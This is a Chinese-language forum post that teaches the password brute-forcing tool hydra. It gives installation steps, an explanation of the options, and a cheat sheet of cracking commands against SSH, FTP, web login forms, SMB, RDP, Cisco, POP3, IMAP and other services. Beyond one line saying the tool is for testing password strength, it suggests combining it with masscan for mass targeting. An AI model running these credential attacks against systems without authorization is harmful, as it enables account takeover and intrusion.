设为首页 收藏本站

运维网

查看: 356|回复: 0
打印 上一主题 下一主题

[经验分享] hydra-基于linux的密码暴力破解工具

[复制链接]

累计签到:13 天
连续签到:1 天
跳转到指定楼层
1#
发表于 2019-4-30 09:53:09 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
? ?? ?? ?? ?? ?? ? 安装和使用
hail hydra!每个漫威粉都应该知道这个口号,它是漫威宇宙中最大的人类反派组织九头蛇的名片。如今hydra是行业有名的密码暴力破解工具。
(1)安装hydra
以centos7为例,安装完epel库后直接使用 yum install -y hydra 即可安装。
(2)使用hydra
# hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns]
[-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV]
server service [OPT]
例如:hydra -l root -P passwd.txt 192.168.1.1 -V -s 22 ssh -o show.txt
使用root加passwd.txt的密码词典爆破192.168.1.1 ssh的22号端口并显示破解信息并将破解的信息输出到show.txt文件里面。
(1)大写的L 可以指定用户词典。
(2)小写的p可以指定密码。
(3)大写的M可以指定目标IP库,一行一条,配合masscan扫描器使用简直神器。
(4)-f 在使用-M参数后,找到第一对登录名或者密码的时候终止破解。
(5)-t 同时运行的线程数,默认为16。
(6)-w 设置最大超时的时间,单位秒,默认是30s。
(7)-o 指定结果输出文件。
(8)-e ns 可选选项,n:空密码试探,s:使用指定用户和密码试探。
(9)大写的S 采用SSL连接。
(10)-R 继续从上一次进度接着破解。
使用方法:(1)破解ssh:
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip ssh
hydra -l 用户名 -p 密码字典 -t 线程 -o save.log -vV ip ssh
(2)破解ftp:
hydra ip ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV
hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV
(3)get方式提交,破解web登录:
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get /admin/
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get /admin/index.php
(4)post方式提交,破解web登录:
hydra -l 用户名 -P 密码字典 -s 80 ip http-post-form "/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorry password"
hydra -t 3 -l admin -P pass.txt -o out.txt -f 192.168.1.1 http-post-form "login.php:id=^USER^&passwd=^PASS^:wrong username or password"
(参数说明:-t同时线程数3,-l用户名是admin,字典pass.txt,保存为out.txt,-f 当破解了一个密码就停止, 192.168.1.1目标ip,http-post-form表示破解是采用http的post方式提交的表单密码破解,中 的内容是表示错误猜解的返回信息提示。) <br> <strong>(5)破解https: </strong><br> hydra -m /index.php -l muts -P pass.txt 192.168.1.1 https <br> <strong>(6)破解teamspeak: </strong><br> hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak <br> <strong>(7)破解cisco: </strong><br> hydra -P pass.txt 192.168.1.254 cisco <br> hydra -m cloud -P pass.txt 192.168.1.254 cisco-enable <br> <strong>(8)破解smb: </strong><br> hydra -l administrator -P pass.txt 192.168.1.1 smb <br> <strong>(9)破解pop3: </strong><br> hydra -l muts -P pass.txt my.pop3.mail pop3 <br> <strong>(10)破解rdp: </strong><br> hydra ip rdp -l administrator -P pass.txt -V <br> <strong>(11)破解http-proxy: </strong><br> hydra -l admin -P pass.txt http-proxy://192.168.1.1<br> <strong>(12)破解imap: </strong><br> hydra -L user.txt -p secret 192.168.1.1 imap PLAIN <br> hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN<br> <strong>最后小结</strong>(1)这个工具仅供测试服务器系统的密码强度。<br> (2)账号密码词典需要自己编写或者去找安全大神要。<br> (3)它终究是一个工具,要想发挥其最大的作用,需要配和wireshark、nmap、masscan使用。<br> (4)附上windows版本的下载地址<br> <a href="https://github.com/maaaaz/thc-hydra-windows" rel="nofollow" target="_blank">https://github.com/maaaaz/thc-hydra-windows</a><br> <br> ? ?? ?? ?? ?? ?<br> <br>
+1 2

运维网声明 1、欢迎大家加入本站运维交流群:群②:197202523 群⑤:202807635 群⑦870801961 群⑧679858003 群⑨230483671
2、本站所有主题由该帖子作者发表,该帖子作者与运维网享有帖子相关版权
3、所有作品的着作权均归原作者享有,请您和我们一样尊重他人的着作权等合法权益。如果您对作品感到满意,请购买正版
4、禁止制作、复制、发布和传播具有反动、淫秽、色情、暴力、凶杀等内容的信息,一经发现立即删除。若您因此触犯法律,一切后果自负,我们对此不承担任何责任
5、所有资源均系网友上传或者通过网络收集,我们仅提供一个展示、介绍、观摩学习的平台,我们不对其内容的准确性、可靠性、正当性、安全性、合法性等负责,亦不承担任何法律责任
6、所有作品仅供您个人学习、研究或欣赏,不得用于商业或者其他用途,否则,一切后果均由您自己承担,我们对此不承担任何法律责任
7、如涉及侵犯版权等问题,请您及时通知我们,我们将立即采取措施予以解决
8、联系人Email:admin@yunvn.com 网址:www.iyunv.com

所有资源均系网友上传或者通过网络收集,我们仅提供一个展示、介绍、观摩学习的平台,我们不对其承担任何法律责任,如涉及侵犯版权等问题,请您及时通知我们,我们将立即处理,联系人Email:kefu@yunvn.com,QQ:1061981298 本贴地址:https://www.iyunv.com/thread-836224-1-1.html 上篇帖子: 网易业WEB白帽子黑客训练营 下篇帖子: Web攻防之业务安全实战指南 高清pdf扫描版[46MB]
点击关注更多内容

本版积分规则 ?允许回帖邮件提醒楼主

扫码加入运维网微信交流群X

扫码加入运维网微信交流群

扫描二维码加入运维网微信交流群,最新一手资源尽在官方微信交流群!快快加入我们吧...

扫描微信二维码查看详情

客服 E-mail:kefu@yunvn.com

本站由青云提供云计算服务

运维网--中国最专业的运维工程师交流社区

京ICP备14039699号-1 Copyright ? 2012-2020

使用手机软件扫描微信二维码

关注我们可获取更多热点资讯

Good good study day day up


客服E-mail:kefu@yunvn.com 在线客服QQ:点击这里给我发消息


提醒:禁止发布任何违反国家法律、法规的言论与图片等内容;本站内容均来自个人观点与网络等信息,非本站认同之观点.


本站大部分资源是网友从网上搜集分享而来,其版权均归原作者及其网站所有,我们尊重他人的合法权益,如有内容侵犯您的合法权益,请及时与我们联系进行核实删除!



合作伙伴: 青云cloud bjyun

快速回复 返回顶部 返回列表